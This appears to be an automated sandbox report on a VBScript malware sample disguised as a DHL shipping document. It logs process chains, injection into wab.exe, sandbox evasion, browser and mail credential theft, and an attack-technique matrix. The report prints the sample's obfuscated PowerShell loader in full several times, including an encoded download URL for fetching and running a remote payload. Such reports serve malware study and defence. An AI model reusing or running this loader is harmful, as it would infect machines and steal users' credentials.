            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B 
BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk 
ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8A09AD push E85E515Dh; ret 1_2_00007FFD9B8A09F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B9771C8 push esp; retf 1_2_00007FFD9B9771C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_078D08C2 push eax; mov dword ptr [esp], ecx 4_2_078D0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_078DB144 push 8B6B39BFh; iretd 4_2_078DB149
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_078D0AB8 push eax; mov dword ptr [esp], ecx 4_2_078D0AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22240000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22400000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 24400000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5536
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4388
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7375
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2318
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3806
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4054
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764 Thread sleep count: 7375 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep count: 2318 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824 Thread sleep time: -25825441703193356s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824 Thread sleep time: -100000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164 Thread sleep count: 3806 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164 Thread sleep count: 4054 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000
            Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2329475776.000001D971C5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla.(
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_078D0638 LdrInitializeThunk,4_2_078D0638
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFA44
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <obfuscated PowerShell command line>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" <obfuscated PowerShell command line>
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b 
bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\FTP Navigator\Ftplist.txt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

            Remote Access Functionality

            Source: Yara match | File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 221 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 221 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 111 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 111 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Behavior Graph ID: 1430756 | Sample: DHL Shipping doc.vbs | Startdate: 24/04/2024 | Architecture: WINDOWS | Score: 100
            Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
